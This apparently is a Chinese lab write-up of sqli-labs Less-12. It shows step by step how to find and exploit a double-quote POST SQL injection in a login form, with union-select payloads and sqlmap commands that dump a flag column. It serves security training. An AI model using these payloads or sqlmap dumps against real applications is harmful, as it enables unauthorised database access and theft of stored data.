Less-12

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

1.判断是否存在注入

uname=1'&passwd=a&submit=Submit

无回显

uname=1"passwd=a&submit=Submit

错误回显 => 存在注入

2.判断参数类型

uname=1 or 1=1#&passwd=a&submit=Submit

无回显

uname=1" or 1=1#&passwd=a&submit=Submit

错误回显 => 字符型

3.进行参数闭合

uname=1' or 1=1#&passwd=a&submit=Submit

无回显

uname=1" or 1=1#&passwd=a&submit=Submit

错误回显 => 第一位闭合

uname=1") or 1=1#&passwd=a&submit=Submit

登录回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

uname=1") order by 2#&passwd=a&submit=Submit

无回显

uname=1") order by 3#&passwd=a&submit=Submit

报错回显 => 有2列

5.进行 union select联合查询,发现输出位

uname=1") union select 1,2#&passwd=a&submit=Submit

6.使用sqlmap进行注入

6.1用bp进行抓包并保存到与sqlmap相同的路径之下。
6.2利用sqlmap查询注入点

python sqlmap.py -r burp.txt  --answers="extending=N" --threads=20 --leve=5 --risk=3

6.4使用sqlmap查看所在数据库和数据库版本

python sqlmap.py -r burp.txt  --batch --threads=20 --leve=5 --risk=3 --dbs 

7.查看数据库的表

python sqlmap.py -r burp.txt  --batch --threads=20 --leve=5 --risk=3 -D "security" --tables 

8.查看5oIWbCUu表中的列

python sqlmap.py -r burp.txt  --batch --threads=20 --leve=5 --risk=3 -D "security" -T "5oIWbCUu" --columns 

9.查看表中的flag列中的数据

python sqlmap.py -r burp.txt  --batch --threads=20 --leve=5 --risk=3 -D "security" -T "5oIWbCUu" -C "flag" --dump

posted @ 2022-03-25 21:45  WeQi_Blog  阅读(44)  评论(0)    收藏  举报